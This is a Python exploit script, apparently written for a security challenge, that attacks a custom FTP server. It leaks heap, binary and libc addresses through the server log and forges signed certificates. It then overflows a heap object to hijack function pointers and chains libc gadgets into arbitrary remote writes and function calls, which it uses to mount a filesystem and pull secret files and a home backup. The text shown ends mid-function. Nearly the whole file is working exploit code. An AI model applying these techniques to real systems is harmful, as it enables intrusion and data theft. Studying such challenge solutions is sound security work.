# -*- coding:utf-8 -*-
from __future__ import print_function, unicode_literals
import os
import sys
import time
import struct
import base64
import ftplib
import logging
import argparse

import hsm

log = logging.getLogger(__name__)
log.setLevel(logging.DEBUG)

g_got_getenv_offset = 0x8E20
g_computeSigUser_offset = 0x49C0
g_computeSigCert_offset = 0x4AD0
g_anonymousString_offset = 0x6101
g_destructorFTPServer_offset = 0x3330
g_binaryBaseAddress = 0
g_libcBaseAddress = 0
g_libc_getenv_address = 0
g_libc_getenv_offset = 0x45ED0
g_libc_chdir_offset = 0x10EA40
g_getenv_to_chdir_offset = 822128
g_libc_chdir_address = 0
g_libc_open_offset = 0x10DD10
g_libc_mmap_offset = 0x1188F0
g_libc_getcontext_offset = 0x54E40
g_libc_getcontext_address = 0
g_libc_setcontext_offset = 0x54F50
g_libc_setcontext_address = 0
g_libc_memset_address = 0
g_libc_memset_offset = 0x22560
g_libc_read_address = 0
g_libc_read_offset = 0x10DFF0
g_libc_write_offset = 0x10E090
g_libc_close_offset = 0x10E830
g_libc_mmap_offset = 0x1188F0
g_libc_remove_offset = 0x62E70
g_libc_mkdir_offset = 0x10DC80
g_libc_utime_offset = 0x10D400
g_libc_time_offset = 0xD0E20
g_libc_rwzone_address = 0
g_libc_rwzone_offset = 0x1ED800

# 0x946db: mov r8, qword [rdi+0x08] ; mov rax, qword [rdi] ; mov rdi, r8 ; jmp rax ;
g_libc_gadget1_offset = 0x946db

# 0x74a96: mov rsi, qword [r14+0x18] ; mov rdx, qword [r14+0x20] ; mov rdi, r15 ; sub rdx, rsi ; call qword [rbx+0x38] ;
g_libc_gadget2_offset = 0x74a96

# 0x18f9bc: pop rcx ; jmp qword [rdx-0x0F] ;
g_libc_gadget3_offset = 0x18f9bc

# setcontext and call
g_libc_gadget4_offset = 0x55076

g_umount_trigger = 0

def parseArgs() :
    parser = argparse.ArgumentParser(description = 'ftp client')
    parser.add_argument('--ip', default = '192.168.138.128')
    # parser.add_argument('--ip', default = '192.168.106.130')
    parser.add_argument('--port', type = int, default = 31500)
    # parser.add_argument('--port', type = int, default = 31337)
    args = parser.parse_args()
    return args

def resolveAddresses() :

    # libc
    if g_libc_getenv_address :
        global g_libcBaseAddress
        g_libcBaseAddress = g_libc_getenv_address - g_libc_getenv_offset
        print('libc base address', hex(g_libcBaseAddress))

        global g_libc_chdir_address
        g_libc_chdir_address = g_libcBaseAddress + g_libc_chdir_offset
        print('chdir address', hex(g_libc_chdir_address))

        global g_libc_getcontext_address
        g_libc_getcontext_address = g_libcBaseAddress + g_libc_getcontext_offset

        global g_libc_setcontext_address
        g_libc_setcontext_address = g_libcBaseAddress + g_libc_setcontext_offset

        global g_libc_rwzone_address
        g_libc_rwzone_address = g_libcBaseAddress + g_libc_rwzone_offset
        print('g_libc_rwzone_address', hex(g_libc_rwzone_address))

        global g_libc_memset_address
        g_libc_memset_address = g_libcBaseAddress + g_libc_memset_offset

def craftCert(user = b'anon', wrongSig = 0, b64encode = 1) :
    

    data = b'perms=2&user=' + user
    cert = data + bytes('&sig={}'.format(hsm.sign_data(data) + wrongSig), encoding='utf8')

    # cert = b'0'
    # while len(cert) < size :
    #     cert += b'A'


    if b64encode :
        cert = base64.b64encode(cert).decode('utf-8')

    # print(encoded)
    # print(len(encoded))
    return cert


data = b''
def sendCmd(ftp, cmd, arg) :
    global data
    data = b''

    def getData(x) :
        global data
        data += x

    try :
        res = ftp.retrbinary(cmd + ' ' + arg, getData)
    except BaseException as e :
        print(e)
    else :
        print(res)

    return data

def sendCmdSimple(ftp, cmd) :
    try :
        res = ftp.sendcmd(cmd)
    except BaseException as e :
        print(e)
    else :
        print(res)

def leakSigAndGetSecret(ftp) :
    print(ftp.getwelcome())
    sendCmdSimple(ftp, 'USER anon')
    sendCmdSimple(ftp, 'PASS anon')
    sendCmdSimple(ftp, 'DBG')
    sendCmdSimple(ftp, 'USER aaaaaaaaaaaasig1=')
    sendCmdSimple(ftp, 'USER anon')
    sendCmdSimple(ftp, 'PASS anon')

    sendCmdSimple(ftp, 'USER anonymous')
    sendCmdSimple(ftp, 'PASS anonymous')
    sendCmdSimple(ftp, 'USER aaaaaaaaaaaasig2=')
    sendCmdSimple(ftp, 'USER anon')
    sendCmdSimple(ftp, 'PASS anon')
    data = sendCmd(ftp, 'RETR', 'ftp.log')

    pattern = b'User aaaaaaaaaaaasig1'
    offset = data.find(pattern)
    sig1 = struct.unpack('<Q', data[offset+len(pattern):offset+len(pattern)+8])[0]

    pattern = b'User aaaaaaaaaaaasig2'
    offset = data.find(pattern)
    sig2 = struct.unpack('<Q', data[offset+len(pattern):offset+len(pattern)+8])[0]

    print('sig1', hex(sig1), 'sig2', hex(sig2))

    hsm.k1 = int(input('k1'))
    hsm.k2 = int(input('k2'))

    sendCmdSimple(ftp, 'CERT {}'.format(craftCert()))

    data = sendCmd(ftp, 'RETR', 'secret.txt')

    print(data)

    sendCmdSimple(ftp, 'QUIT')

def leakHeapAddress(ftp) :
    print(ftp.getwelcome())
    sendCmdSimple(ftp, 'USER anon')
    sendCmdSimple(ftp, 'PASS anon')
    sendCmdSimple(ftp, 'DBG')
    sendCmdSimple(ftp, 'USER aaaaaaaaaaaasig1=')
    sendCmdSimple(ftp, 'USER anon')
    sendCmdSimple(ftp, 'PASS anon')

    sendCmdSimple(ftp, 'USER anonymous')
    sendCmdSimple(ftp, 'PASS anonymous')
    sendCmdSimple(ftp, 'USER aaaaaaaaaaaasig2=')
    sendCmdSimple(ftp, 'USER anon')
    sendCmdSimple(ftp, 'PASS anon')
    data = sendCmd(ftp, 'RETR', 'ftp.log')

    pattern = b'User aaaaaaaaaaaasig1'
    offset = data.find(pattern)
    sig1 = struct.unpack('<Q', data[offset+len(pattern):offset+len(pattern)+8])[0]

    pattern = b'User aaaaaaaaaaaasig2'
    offset = data.find(pattern)
    sig2 = struct.unpack('<Q', data[offset+len(pattern):offset+len(pattern)+8])[0]

    # print('sig1', hex(sig1), 'sig2', hex(sig2))

    # hsm.k1 = int(input('k1'))
    # hsm.k2 = int(input('k2'))

    # Alloc a buffer for the new username, Free 0x30 ftpuser and alloc 0x30 ftpcert
    sendCmdSimple(ftp, 'CERT {}'.format(craftCert(user = b'&user=' + b'A'*(0x30-1) + b'&user=' + b'B'*(0x30-1) + b'&user=' + b'C'*(0x30-1))))

    # Free ftpcert->username, heap metadata will be leaked in it
    sendCmdSimple(ftp, 'CERT {}'.format(craftCert(user = b'D'*(0x10), wrongSig=1)))

    # leak ftpcert to prevent use after free of ftpcert->username
    # and get logged to retrieve ftp.log 
    sendCmdSimple(ftp, 'USER anon')
    sendCmdSimple(ftp, 'PASS anon')

    # Leak heap metadata for freed username
    data = sendCmd(ftp, 'RETR', 'ftp.log')
    pattern = b'Invalid signature\nUser '
    offset = data.find(pattern)
    heapAddress = struct.unpack('<Q', data[offset+len(pattern):offset+len(pattern)+8])[0] & 0xffffffffffff
    print('Leaked heap address ', hex(heapAddress))

    return heapAddress


def craftFtpCertObject(usernameAddress = 0, usernameSig = 0, computeSigCert = 0) :
    if computeSigCert == 0 : computeSigCert = g_binaryBaseAddress + g_computeSigCert_offset
    data = b''

    # is_authenticated
    data += struct.pack('<Q', 1)

    # permissions
    data += struct.pack('<Q', 1)

    # username
    data += struct.pack('<Q', usernameAddress)

    # sig_computed_with_hsm
    data += struct.pack('<Q', usernameSig)

    # computeSigCert
    data += struct.pack('<Q', hsm.auth_pointer(computeSigCert))

    # destructorCert
    data += struct.pack('<Q', hsm.auth_pointer(g_binaryBaseAddress + g_destructorFTPServer_offset))

    return data

def setHsmKeys(sig1, sig2, computeSigUserSigned) :
    print('sig1,sig2 print(solveKeys({},{}))'.format(hex(sig1), hex(sig2)))
    val1 = struct.unpack('<Q', b'\x01anon\x00\x00\x00')[0]
    val2 = 0x0
    res = hsm.sign_u64(computeSigUserSigned & 0xffffffffffff, val2) & 0xffff000000000000

    while res != (computeSigUserSigned & 0xffff000000000000) :
        data = input('k1,k2')
        hsm.k1 = int(data.split(',')[0])
        hsm.k2 = int(data.split(',')[1])
        res = hsm.sign_u64(computeSigUserSigned & 0xffffffffffff, val2) & 0xffff000000000000

def setHsmKeysWithRetry(sig1, sig2, computeSigUserSigned, ftp) :
    print('sig1,sig2 print(solveKeys({},{}))'.format(hex(sig1), hex(sig2)))

    # Alloc a buffer for the new username, Free 0x30 ftpuser and alloc 0x30 ftpcert
    sendCmdSimple(ftp, 'CERT {}'.format(craftCert(user = b'&user=' + b'A'*(0x30-1) + b'&user=' + b'B'*(0x30-1) + b'&user=' + b'C'*(0x30-1))))
    data = sendCmd(ftp, 'RETR', 'secret.txt')

    while len(data) == 0 :
        data = input('k1,k2')
        hsm.k1 = int(data.split(',')[0])
        hsm.k2 = int(data.split(',')[1])
        sendCmdSimple(ftp, 'CERT {}'.format(craftCert(user = b'&user=' + b'A'*(0x30-1) + b'&user=' + b'B'*(0x30-1) + b'&user=' + b'C'*(0x30-1))))
        data = sendCmd(ftp, 'RETR', 'secret.txt')



def sensitive(ftp) :
    print(ftp.getwelcome())

    sendCmdSimple(ftp, 'CERT {}'.format(craftCert(user = b'&user=' + b'X'*(0x30-1), wrongSig=1)))

    sendCmdSimple(ftp, 'USER anon')
    sendCmdSimple(ftp, 'PASS anon')
    sendCmdSimple(ftp, 'DBG')
    sendCmdSimple(ftp, 'USER aaaaaaaaaaaasig1=')
    sendCmdSimple(ftp, 'USER anon')
    sendCmdSimple(ftp, 'PASS anon')

    sendCmdSimple(ftp, 'USER anonymous')
    sendCmdSimple(ftp, 'PASS anonymous')
    sendCmdSimple(ftp, 'USER aaaaaaaaaaaasig2=')
    sendCmdSimple(ftp, 'USER anon')
    sendCmdSimple(ftp, 'PASS anon')
    data = sendCmd(ftp, 'RETR', 'ftp.log')

    pattern = b'User aaaaaaaaaaaasig1'
    offset = data.find(pattern)
    sig1 = struct.unpack('<Q', data[offset+len(pattern):offset+len(pattern)+8])[0]

    pattern = b'User aaaaaaaaaaaasig2'
    offset = data.find(pattern)
    sig2 = struct.unpack('<Q', data[offset+len(pattern):offset+len(pattern)+8])[0]

    computeSigUserSigned = struct.unpack('<Q', data[offset+len(pattern)+8:offset+len(pattern)+16])[0]
    global g_binaryBaseAddress
    g_binaryBaseAddress = (computeSigUserSigned - g_computeSigUser_offset) & 0xffffffffffff
    print('Binary base address ', hex(g_binaryBaseAddress))

    setHsmKeys(sig1, sig2, computeSigUserSigned)

    # Alloc a buffer for the new username, Free 0x30 ftpuser and alloc 0x30 ftpcert
    sendCmdSimple(ftp, 'CERT {}'.format(craftCert(user = b'&user=' + b'A'*(0x30-1) + b'&user=' + b'B'*(0x30-1) + b'&user=' + b'C'*(0x30-1))))

    data = b''
    data += b'D' * 0x210
    # Overwrite username to point to getenv address and leak it
    data += craftFtpCertObject(usernameAddress = g_binaryBaseAddress + g_got_getenv_offset)
    # Overflow ftpcert object
    sendCmdSimple(ftp, 'CERT {}'.format(base64.b64encode(data).decode('utf-8')))

    # Overflow ftpcert object to restore a proper name and get logged
    data = b''
    while len(data) < 0x210 :
        data += b'D'
    data += craftFtpCertObject(usernameAddress = g_binaryBaseAddress + g_anonymousString_offset, usernameSig = sig2)
    sendCmdSimple(ftp, 'CERT {}'.format(base64.b64encode(data).decode('utf-8')))

    data = sendCmd(ftp, 'RETR', 'ftp.log')
    # print(data)

    pattern = b'530 Invalid cert\nUser '
    offset = data.find(pattern)

    global g_libc_getenv_address
    g_libc_getenv_address = struct.unpack('<Q', data[offset+len(pattern):offset+len(pattern)+8])[0] & 0xffffffffffff
    print('lib getenv address', hex(g_libc_getenv_address))

    resolveAddresses()

    # Now overflow computeSigCert pointer from ftpcert object with chdir.
    # It will be called in canExecCmdFTPServer with ftpcert pointer as first argument.
    # We place the string argument at the beginning of ftpcert object.
    data = b''
    data += b'D' * 0x210
    chdirArg = b'sensitive\x00'
    data +=  chdirArg + craftFtpCertObject(computeSigCert=g_libc_chdir_address)[len(chdirArg):]
    # Overflow ftpcert object
    sendCmdSimple(ftp, 'CERT {}'.format(base64.b64encode(data).decode('utf-8')))

    # Overflow ftpcert object to get logged
    data = b''
    while len(data) < 0x210 :
        data += b'D'
    data += craftFtpCertObject(usernameAddress = g_binaryBaseAddress + g_anonymousString_offset, usernameSig = sig2)
    sendCmdSimple(ftp, 'CERT {}'.format(base64.b64encode(data).decode('utf-8')))

    data = sendCmd(ftp, 'RETR', 'm00n.txt')
    print(data.decode('utf-8'))

    data = sendCmd(ftp, 'LIST', '')
    print(data.decode('utf-8'))

    data = sendCmd(ftp, 'RETR', 'home_backup.tar.zz')
    with open('home_backup.tar.zz', 'wb') as f :
        f.write(data)

    sendCmdSimple(ftp, 'QUIT')

def remoteWrite(ftp, address, dataToRemoteWrite) :
    # print('remoteWrite {:} @ {:x}'.format(dataToRemoteWrite, address))
    # It works as long as strlen(address) <= len(dataToRemoteWrite)

    data = b'perms=2&user=' + dataToRemoteWrite
    cert = data + bytes('&sig={}'.format(hsm.sign_data(data)), encoding='utf8')

    while len(cert) < 0x208 :
        cert += b'D'
    # Heap metadata for ftpcert chunk (size + flags)
    cert += struct.pack('<Q', 0x41)

    # Overflow ftpcert object to overwrite the username field and make it point to target address to write
    cert += craftFtpCertObject(usernameAddress = address)

    sendCmdSimple(ftp, 'CERT {}'.format(base64.b64encode(cert).decode('utf-8')))

    return

def remoteWriteHandleZero(ftp, address, dataToRemoteWrite) :
    i = 0
    while i < len(dataToRemoteWrite) :
        data = b''
        while i < len(dataToRemoteWrite) and dataToRemoteWrite[i] != 0 :
            data += bytes([dataToRemoteWrite[i]])
            i += 1

            if len(data) == 0x7f :
                break

        remoteWrite(ftp, address + i - len(data), data)

        while i < len(dataToRemoteWrite) and dataToRemoteWrite[i] == 0 :
            i += 1



def remoteCall(ftp, address, params, anonymousUsernameSig, bp = 0, getLogged = True, cleanup = True) :
    """
        Wrapper which clean remote artefact after the call,
        in order to circumvent the remoteWrite limitation
        and be able to call several functions.
    """

    global g_libc_rwzone_address
    rwzoneBackup = g_libc_rwzone_address

    # Make sure the low byte is not zero (limitation of remoteWrite which works with strings)
    g_libc_rwzone_address += 8
    remoteCall_internal(ftp, address, params, anonymousUsernameSig, bp, getLogged=getLogged)

    
    g_libc_rwzone_address += 0x100

    if cleanup :
        remoteCall_internal(ftp, g_libc_memset_address, [g_libc_rwzone_address - 0x100, 0, 0x208], anonymousUsernameSig, getLogged=getLogged)

    g_libc_rwzone_address = rwzoneBackup

def remoteCall_internal(ftp, address, params, anonymousUsernameSig, bp = 0, getLogged = True) :

    r14 = g_libc_rwzone_address
    rdx = g_libc_rwzone_address + 0x40

    remoteWrite(ftp, r14 + 0x20, struct.pack('<Q', rdx).strip(b'\x00'))
    remoteWrite(ftp, rdx - 0xf, struct.pack('<Q', g_libcBaseAddress + g_libc_gadget4_offset).strip(b'\x00'))

    # address to call
    if address & 0xff != 0 :
        remoteWrite(ftp, rdx + 0xa8, struct.pack('<Q', address).strip(b'\x00'))
    else :
        remoteWrite(ftp, rdx + 0xa8 + 1, struct.pack('<Q', address).strip(b'\x00'))

    assert len(params) <= 6

    # Offsets for RDI, RSI, RDX, RCX, R8 and R9
    contextOffsets = [0x68, 0x70, 0x88, 0x98, 0x28, 0x30]
    for i in range(len(params)) :
        value = struct.pack('<Q', params[i]).strip(b'\x00')
        if b'\x00' in value :
            print('[!] Warning, 00 in param', value)
            splitted = value.split(b'\x00')
            assert len(splitted) == 2
            remoteWrite(ftp, rdx + contextOffsets[i], splitted[0])
            remoteWrite(ftp, rdx + contextOffsets[i] + len(splitted[0]) + 1, splitted[1])
        else :
            remoteWrite(ftp, rdx + contextOffsets[i], value)

    print('[remoteCall] args written')

    # Now overflow computeSigCert pointer from ftpcert object with a gadget
    # It will be called in canExecCmdFTPServer with ftpcert pointer as first argument.
    data = b''
    data += b'D' * 0x208
    # Heap metadata for ftpcert chunk (size + flags)
    data += struct.pack('<Q', 0x41)

    ###  TODO : why this does not works when address & 0xff == 0
    chdirArg = struct.pack('<Q', 0xaaaaaaaa)
    data +=  chdirArg + craftFtpCertObject(computeSigCert=g_libcBaseAddress + g_libc_gadget2_offset, usernameSig=r14)[len(chdirArg):]
    # data +=  chdirArg + craftFtpCertObject(computeSigCert=0xcccccccccc, usernameSig=0xdddddddddddddd)[len(chdirArg):]

    # Overflow ftpcert (rbx, rdi) +0x30 and 0x38 (size field metadata of next chunk)
    data += struct.pack('<Q', 0x0) + struct.pack('<Q', g_libcBaseAddress + g_libc_gadget3_offset)

    # Overflow ftpcert object
    sendCmdSimple(ftp, 'CERT {}'.format(base64.b64encode(data).decode('utf-8')))

    global g_umount_trigger
    if g_umount_trigger :
        remoteWrite(ftp, 0x44444000, b'\x01')
        time.sleep(2)
        # input('g_umount_trigger')

    if getLogged == False :
        return

    # Overflow ftpcert object to get logged
    data = b''
    while len(data) < 0x208 :
        data += b'D'
    # Heap metadata for ftpcert chunk (size + flags)
    data += struct.pack('<Q', 0x41)
    data += craftFtpCertObject(usernameAddress = g_binaryBaseAddress + g_anonymousString_offset, usernameSig = anonymousUsernameSig)

    # Restore ftpcert (rbx, rdi) +0x30 and 0x38 (size field metadata of next chunk)
    data += struct.pack('<Q', 0x0) + struct.pack('<Q', 0x111)

    sendCmdSimple(ftp, 'CERT {}'.format(base64.b64encode(data).decode('utf-8')))

    return

def step5LeakUnusedSectors(ftp) :
    print(ftp.getwelcome())

    sendCmdSimple(ftp, 'CERT {}'.format(craftCert(user = b'&user=' + b'X'*(0x30-1), wrongSig=1)))

    sendCmdSimple(ftp, 'USER anon')
    sendCmdSimple(ftp, 'PASS anon')
    sendCmdSimple(ftp, 'DBG')
    sendCmdSimple(ftp, 'USER aaaaaaaaaaaasig1=')
    sendCmdSimple(ftp, 'USER anon')
    sendCmdSimple(ftp, 'PASS anon')

    sendCmdSimple(ftp, 'USER anonymous')
    sendCmdSimple(ftp, 'PASS anonymous')
    sendCmdSimple(ftp, 'USER aaaaaaaaaaaasig2=')
    sendCmdSimple(ftp, 'USER anon')
    sendCmdSimple(ftp, 'PASS anon')
    data = sendCmd(ftp, 'RETR', 'ftp.log')

    pattern = b'User aaaaaaaaaaaasig1'
    offset = data.find(pattern)
    sig1 = struct.unpack('<Q', data[offset+len(pattern):offset+len(pattern)+8])[0]

    pattern = b'User aaaaaaaaaaaasig2'
    offset = data.find(pattern)
    sig2 = struct.unpack('<Q', data[offset+len(pattern):offset+len(pattern)+8])[0]

    computeSigUserSigned = struct.unpack('<Q', data[offset+len(pattern)+8:offset+len(pattern)+16])[0]
    global g_binaryBaseAddress
    g_binaryBaseAddress = (computeSigUserSigned - g_computeSigUser_offset) & 0xffffffffffff
    print('Binary base address ', hex(g_binaryBaseAddress))

    setHsmKeys(sig1, sig2, computeSigUserSigned)

    # Alloc a buffer for the new username, Free 0x30 ftpuser and alloc 0x30 ftpcert
    sendCmdSimple(ftp, 'CERT {}'.format(craftCert(user = b'&user=' + b'A'*(0x30-1) + b'&user=' + b'B'*(0x30-1) + b'&user=' + b'C'*(0x30-1))))

    data = b''
    data += b'D' * 0x208
    # Heap metadata for ftpcert chunk (size + flags)
    data += struct.pack('<Q', 0x41)
    # Overwrite username to point to getenv address and leak it
    data += craftFtpCertObject(usernameAddress = g_binaryBaseAddress + g_got_getenv_offset)
    # Overflow ftpcert object
    sendCmdSimple(ftp, 'CERT {}'.format(base64.b64encode(data).decode('utf-8')))

    # Overflow ftpcert object to restore a proper name and get logged
    data = b''
    while len(data) < 0x208 :
        data += b'D'
    # Heap metadata for ftpcert chunk (size + flags)
    data += struct.pack('<Q', 0x41)
    data += craftFtpCertObject(usernameAddress = g_binaryBaseAddress + g_anonymousString_offset, usernameSig = sig2)
    sendCmdSimple(ftp, 'CERT {}'.format(base64.b64encode(data).decode('utf-8')))

    data = sendCmd(ftp, 'RETR', 'ftp.log')
    # print(data)

    pattern = b'530 Invalid cert\nUser '
    offset = data.find(pattern)

    global g_libc_getenv_address
    g_libc_getenv_address = struct.unpack('<Q', data[offset+len(pattern):offset+len(pattern)+8])[0] & 0xffffffffffff
    print('lib getenv address', hex(g_libc_getenv_address))

    resolveAddresses()

    arg1Address = g_libc_rwzone_address+0x218
    remoteWrite(ftp, arg1Address, b'/run/mount_shm')
    # remoteWrite(ftp, arg1Address, b'/home/user/test')
    remoteCall(ftp, g_libcBaseAddress + g_libc_open_offset, [arg1Address, 2, 438], sig2)

    remoteCall(ftp, g_libcBaseAddress + g_libc_mmap_offset, [0x44444444, 0x4444, 3, 1, 7, 0], sig2)

    
    remoteWrite(ftp, 0x44444000 + 0x104, b'mount')
    remoteWrite(ftp, 0x44444000 + 0x204, b'goodfs')
    remoteWrite(ftp, 0x44444000 + 0x004, b'MGhtT34gHj5yFcszRYB4gf45DtymEi')
    remoteWrite(ftp, 0x44444000, b'\x01')

    time.sleep(2)

    # mmap
    PROT_READ = 1
    PROT_WRITE = 2
    MAP_PRIVATE = 2
    MAP_ANONYMOUS = 0x20
    remoteCall(ftp, g_libcBaseAddress + g_libc_mmap_offset, [0x33333001, 0x2001, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, 0xffffffff, 0], sig2)

    # Read

    O_READONLY = 0
    O_RDWR = 2
    O_CREAT = 0x40
    O_TRUNC = 0x200
    O_DIRECTORY = 0x010000
    O_TMPFILE = 0x410000

    remoteCall(ftp, g_libc_memset_address, [0x33333004, 0x41, 0x1001], sig2)

    print('create')
    infd = 8
    for i in range(1) :
        # remoteCall(ftp, g_libc_memset_address, [arg1Address, 0, 0x38], sig2)
        # remoteWrite(ftp, arg1Address, b'/mnt/goodfs/public/')
        # remoteWrite(ftp, arg1Address, b'/tmp')
        remoteWrite(ftp, arg1Address, b'/mnt/goodfs/public/newf' + bytes(str(i), encoding = 'utf8'))
        # input(hex(g_libcBaseAddress + g_libc_open_offset))
        # remoteCall(ftp, g_libcBaseAddress + g_libc_open_offset, [arg1Address, O_RDWR|O_TMPFILE|O_TRUNC, 0x1A4], sig2)
        remoteCall(ftp, g_libcBaseAddress + g_libc_open_offset, [arg1Address, O_RDWR|O_CREAT, 0x1A4], sig2)
        
        # remoteCall(ftp, g_libcBaseAddress + g_libc_write_offset, [infd, 0x33333004, 0x501], sig2)
        remoteCall(ftp, g_libcBaseAddress + g_libc_close_offset, [infd], sig2)
        # infd += 1

    remoteCall(ftp, g_libc_memset_address, [0x44444000 + 0x4, 0x0, 0x304], sig2)
    remoteWrite(ftp, 0x44444000 + 0x104, b'umount')
    remoteWrite(ftp, 0x44444000 + 0x204, b'goodfs')
    remoteWrite(ftp, 0x44444000 + 0x004, b'MGhtT34gHj5yFcszRYB4gf45DtymEi')
    remoteWrite(ftp, 0x44444000, b'\x01')

    time.sleep(2)

    remoteCall(ftp, g_libc_memset_address, [0x44444000 + 0x4, 0x0, 0x304], sig2)
    remoteWrite(ftp, 0x44444000 + 0x104, b'mount')
    remoteWrite(ftp, 0x44444000 + 0x204, b'goodfs')
    remoteWrite(ftp, 0x44444000 + 0x004, b'MGhtT34gHj5yFcszRYB4gf45DtymEi')
    remoteWrite(ftp, 0x44444000, b'\x01')

    time.sleep(2)

    remoteCall(ftp, g_libc_memset_address, [arg1Address, 0, 0x38], sig2)

    for i in range(1) :

        remoteCall(ftp, g_libc_memset_address, [0x33333004, 0x0, 0x1001], sig2)
        
        remoteWrite(ftp, arg1Address, b'/mnt/goodfs/public/newf' + bytes(str(i), encoding = 'utf8'))
        # input(hex(g_libcBaseAddress + g_libc_open_offset))
        remoteCall(ftp, g_libcBaseAddress + g_libc_open_offset, [arg1Address, O_RDWR, 0x1A4], sig2)
        outfd = 8
        remoteCall(ftp, g_libcBaseAddress + g_libc_read_offset, [outfd, 0x33333004, 0x1001], sig2)
        remoteCall(ftp, g_libcBaseAddress + g_libc_close_offset, [outfd], sig2)

        # mkdir
        # for i in range(2) :
        #     remoteWrite(ftp, arg1Address, b'/mnt/goodfs/public/newd' + bytes(str(i), encoding = 'utf8'))
        #     remoteCall(ftp, g_libcBaseAddress + g_libc_mkdir_offset, [arg1Address, 0x1A4 | int('700', 8)], sig2)

        #     remoteCall(ftp, g_libcBaseAddress + g_libc_chdir_offset, [arg1Address], sig2)
        #     data = sendCmd(ftp, 'LIST', '')
        #     print('/mnt/goodfs/public/new{}\n'.format(i), data.decode('utf-8'))


        # # Dump

        remoteCall(ftp, g_libc_memset_address, [arg1Address, 0, 0x38], sig2)
        remoteWrite(ftp, arg1Address, b'dump.bin')
        # input(hex(g_libcBaseAddress + g_libc_open_offset))
        remoteCall(ftp, g_libcBaseAddress + g_libc_open_offset, [arg1Address, O_RDWR|O_CREAT|O_TRUNC, 0x1A4], sig2)
        outfd = 8
        remoteCall(ftp, g_libcBaseAddress + g_libc_write_offset, [outfd, 0x33333004, 0x1001], sig2)
        remoteCall(ftp, g_libcBaseAddress + g_libc_close_offset, [outfd], sig2)

        # data = sendCmd(ftp, 'LIST', '')
        # print('/home/sstic\n', data.decode('utf-8'))

        data = sendCmd(ftp, 'RETR', 'dump.bin')
        print(data.rstrip(b'\x00'))
        input('continue ?')


    sendCmdSimple(ftp, 'QUIT')

def step5(ftp) :
    print(ftp.getwelcome())

    sendCmdSimple(ftp, 'CERT {}'.format(craftCert(user = b'&user=' + b'X'*(0x30-1), wrongSig=1)))

    sendCmdSimple(ftp, 'USER anon')
    sendCmdSimple(ftp, 'PASS anon')
    sendCmdSimple(ftp, 'DBG')
    sendCmdSimple(ftp, 'USER aaaaaaaaaaaasig1=')
    sendCmdSimple(ftp, 'USER anon')
    sendCmdSimple(ftp, 'PASS anon')

    sendCmdSimple(ftp, 'USER anonymous')
    sendCmdSimple(ftp, 'PASS anonymous')
    sendCmdSimple(ftp, 'USER aaaaaaaaaaaasig2=')
    sendCmdSimple(ftp, 'USER anon')
    sendCmdSimple(ftp, 'PASS anon')
    data = sendCmd(ftp, 'RETR', 'ftp.log')

    pattern = b'User aaaaaaaaaaaasig1'
    offset = data.find(pattern)
    sig1 = struct.unpack('<Q', data[offset+len(pattern):offset+len(pattern)+8])[0]

    pattern = b'User aaaaaaaaaaaasig2'
    offset = data.find(pattern)
    sig2 = struct.unpack('<Q', data[offset+len(pattern):offset+len(pattern)+8])[0]

    computeSigUserSigned = struct.unpack('<Q', data[offset+len(pattern)+8:offset+len(pattern)+16])[0]
    global g_binaryBaseAddress
    g_binaryBaseAddress = (computeSigUserSigned - g_computeSigUser_offset) & 0xffffffffffff
    print('Binary base address ', hex(g_binaryBaseAddress))

    setHsmKeys(sig1, sig2, computeSigUserSigned)

    # Alloc a buffer for the new username, Free 0x30 ftpuser and alloc 0x30 ftpcert
    sendCmdSimple(ftp, 'CERT {}'.format(craftCert(user = b'&user=' + b'A'*(0x30-1) + b'&user=' + b'B'*(0x30-1) + b'&user=' + b'C'*(0x30-1))))

    data = b''
    data += b'D' * 0x208
    # Heap metadata for ftpcert chunk (size + flags)
    data += struct.pack('<Q', 0x41)
    # Overwrite username to point to getenv address and leak it
    data += craftFtpCertObject(usernameAddress = g_binaryBaseAddress + g_got_getenv_offset)
    # Overflow ftpcert object
    sendCmdSimple(ftp, 'CERT {}'.format(base64.b64encode(data).decode('utf-8')))

    # Overflow ftpcert object to restore a proper name and get logged
    data = b''
    while len(data) < 0x208 :
        data += b'D'
    # Heap metadata for ftpcert chunk (size + flags)
    data += struct.pack('<Q', 0x41)
    data += craftFtpCertObject(usernameAddress = g_binaryBaseAddress + g_anonymousString_offset, usernameSig = sig2)
    sendCmdSimple(ftp, 'CERT {}'.format(base64.b64encode(data).decode('utf-8')))

    data = sendCmd(ftp, 'RETR', 'ftp.log')
    # print(data)

    pattern = b'530 Invalid cert\nUser '
    offset = data.find(pattern)

    global g_libc_getenv_address
    g_libc_getenv_address = struct.unpack('<Q', data[offset+len(pattern):offset+len(pattern)+8])[0] & 0xffffffffffff
    print('lib getenv address', hex(g_libc_getenv_address))

    resolveAddresses()

    arg1Address = g_libc_rwzone_address+0x218

    # Directory listing
    # name = b'/home/sstic/sensitive'
    # while len(name) > 0 :
    #     remoteCall(ftp, g_libc_memset_address, [arg1Address, 0, 0x38], sig2)
    #     remoteWrite(ftp, arg1Address, name)
    #     remoteCall(ftp, g_libcBaseAddress + g_libc_chdir_offset, [arg1Address], sig2)
    #     data = sendCmd(ftp, 'LIST', '')
    #     print('{}\n'.format(name), data.decode('utf-8'))
    #     name = input('dir ? ')
    #     name = bytes(name, encoding = 'utf8')

    remoteCall(ftp, g_libc_memset_address, [arg1Address, 0, 0x38], sig2)
    remoteWrite(ftp, arg1Address, b'/run/mount_shm')
    remoteCall(ftp, g_libcBaseAddress + g_libc_open_offset, [arg1Address, 2, 438], sig2)
    remoteCall(ftp, g_libcBaseAddress + g_libc_mmap_offset, [0x44444444, 0x4444, 3, 1, 7, 0], sig2)
    remoteWrite(ftp, 0x44444000 + 0x104, b'mount')
    
    remoteWrite(ftp, 0x44444000 + 0x204, b'goodfs')
    remoteWrite(ftp, 0x44444000 + 0x004, b'MGhtT34gHj5yFcszRYB4gf45DtymEi')
    remoteWrite(ftp, 0x44444000, b'\x01')

    time.sleep(2)

    # mmap
    PROT_READ = 1
    PROT_WRITE = 2
    MAP_PRIVATE = 2
    MAP_ANONYMOUS = 0x20
    remoteCall(ftp, g_libcBaseAddress + g_libc_mmap_offset, [0x33333001, 0x2001, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, 0xffffffff, 0], sig2)

    # Read

    O_READONLY = 0
    O_WRONLY = 0x1
    O_RDWR = 2
    O_CREAT = 0x40
    O_TRUNC = 0x200
    O_DIRECTORY = 0x010000
    O_TMPFILE = 0x410000
    O_DIRECT = 0x4000
    O_DSYNC = 0x1000

